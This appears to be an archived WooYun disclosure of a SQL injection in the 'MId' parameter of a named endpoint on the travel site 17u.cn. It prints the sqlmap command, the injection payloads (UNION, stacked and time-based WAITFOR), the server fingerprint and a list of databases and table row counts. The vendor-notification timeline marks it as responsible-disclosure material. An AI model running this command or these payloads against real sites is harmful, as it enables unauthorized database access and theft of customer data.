乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-20: 细节已通知厂商并且等待厂商处理中 2013-12-23: 厂商已经确认,细节仅向厂商公开 2014-01-02: 细节向核心白帽子及相关领域专家公开 2014-01-12: 细节向普通白帽子公开 2014-01-22: 细节向实习白帽子公开 2014-02-03: 细节向公众公开
好多裤,好多表,好多好多数据。。。。
注入点:http://www.17u.cn/dujia/AjaxCallNew.aspx?lineId=40202&MId=113&type=GetPrintContent
get参数MId存在注入通知存在注入点,未做进一步测试!
python sqlmap.py -u "www.17u.cn/dujia/AjaxCallNew.aspx?lineId=40202&MId=113&type=GetPrintContent" --batch -p "MId" --dbs --count -D TCHotelsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: MId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lineId=40202&MId=113 AND 2988=2988&type=GetPrintContent Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: lineId=40202&MId=-4973 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(97)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(72)+CHAR(122)+CHAR(101)+CHAR(84)+CHAR(99)+CHAR(90)+CHAR(73)+CHAR(78)+CHAR(79)+CHAR(113)+CHAR(102)+CHAR(120)+CHAR(102)+CHAR(113)-- &type=GetPrintContent Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: lineId=40202&MId=113; WAITFOR DELAY '0:0:5'--&type=GetPrintContent Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: lineId=40202&MId=113 WAITFOR DELAY '0:0:5'--&type=GetPrintContent---web server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008available databases [20]: [*] 17u_net[*] IpData[*] master[*] model[*] msdb[*] TCB2cBlog[*] TCB2cWenDa[*] TCCar[*] TCCLineOrder[*] TCCLineResource[*] TCCLineWeb[*] TCEbook[*] TCFlyPageMonitorDB[*] TCFlyUtility[*] TCHolidayCrawl[*] TCHotel[*] TCHotelResource[*] TCMapBarDataClass[*] TCShare[*] tempdbDatabase: TCHotel +--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.HotelSMSHistory | 11009644 || dbo.HotelMemberLevel | 5775504 || dbo.HotelSystemDealLog | 3995100 || dbo.HotelGroupbuyOrderLog | 2210128 || dbo.HotelFeedBackExtend | 2175113 || dbo.HotelFeedBackExtend | 2175113 || dbo.HotelInfoRoomState | 2029805 || dbo.MemberFirstCall | 1901584 || dbo.HotelSystemMonitorLog | 1722171 || dbo.HotelGroupbuyTickets | 1129813 || dbo.HotelDianpingDealLog | 1104526 || dbo.HotelOrderExChangeLogExtend | 1081474 || dbo.EHotelEBookingInfoRemind | 930794 || dbo.HotelRoomTypeDanBaoInfo | 820389 || dbo.HotelPicLabelRelation | 736767 || dbo.HotelMissCall_AWY | 599958 || dbo.HotelMissCall_AWY | 599958 || dbo.HotelVerifyAccountLog | 308187 || dbo.HolidayHotelRealStatus | 234056 || dbo.HotelEBookingSupplierRelation | 62016 || dbo.HotelScenery | 59268 || dbo.HotelBusinessRelation | 56379 || dbo.HotelBookDealScheduling | 47921 || dbo.HoteleBookingUser | 41579 || dbo.HotelRefund | 38366 || dbo.HoteleBookingManageRelation | 37635 || dbo.HotelHotSpotHotelRelation | 36445 || dbo.HotelHotSpotHotelRelation | 36445 || dbo.HotelControlFeedBack | 31784 || dbo.ctripHotel | 14592 || dbo.IdGenerator | 13567 || dbo.HolidayHotelAttrRelation | 11495 || dbo.HotelHotScenicRelation | 11134 || dbo.HotelFaxSendStation | 10617 || dbo.HotelHotSpotLabelRelation | 8987 || dbo.HotelLinkManLog | 7162 || dbo.HotelLinkManLog | 7162 || dbo.HotelSpecialTypeRelation | 6417 || dbo.HolidayHotelPolicyRelation | 5426 || dbo.HotelCRMSysUser | 4106 || dbo.BusinessSection | 4078 || dbo.HotelTuiJian | 3651 || dbo.MemberHotelRecommend | 2154 || dbo.HotelHotPosition | 1842 || dbo.HotelCityChain | 1635 || dbo.HotelPublicTagRelation | 1578 || dbo.SubwayInfo | 1417 || dbo.DataDictionary | 980 || dbo.HotelCheckCityInfo | 921 || dbo.HotelNoShowType | 889 || dbo.HotelHotScenic | 720 || dbo.HotelInferior | 678 || dbo.EHotelEbookingGuestBook | 613 || dbo.HotelCRMFunction | 452 || dbo.HotelCRMDEP | 220 || dbo.HolidayHotelCityKeyword | 172 || dbo.HotelOrderDataDictionary | 157 || dbo.HotelCityPriceRange | 156 || dbo.HotelDeptProvinceModel | 132 || dbo.EHotelEbookingNotice | 112 || dbo.Sys_Parameter | 109 || dbo.HotelFaxWithOutRelation | 104 || dbo.HotelBookDealClasses | 97 || dbo.HotelOrderCancelReasonDictionary | 78 || dbo.HotelFeaturesPermissions | 77 || dbo.HotelCityFacility | 53 || dbo.HotelAdsSet | 52 || dbo.HotelSubtractPointDeal | 48 || dbo.HotelFeedBackReasonDictionary | 47 || dbo.HotelBookDealWorkType | 31 || dbo.HotelSpecialLabel | 26 || dbo.EHotelEbookingRight | 25 || dbo.HotelTemplate | 24 || dbo.HotelFaxTemplate | 17 || dbo.HotelPageInfoControl | 4 || dbo.HotelSpecialLabelRelation | 2 |+--------------------------------------+---------+
过滤
危害等级:高
漏洞Rank:15
确认时间:2013-12-23 08:08
正在处理中,感谢 @秋风
暂无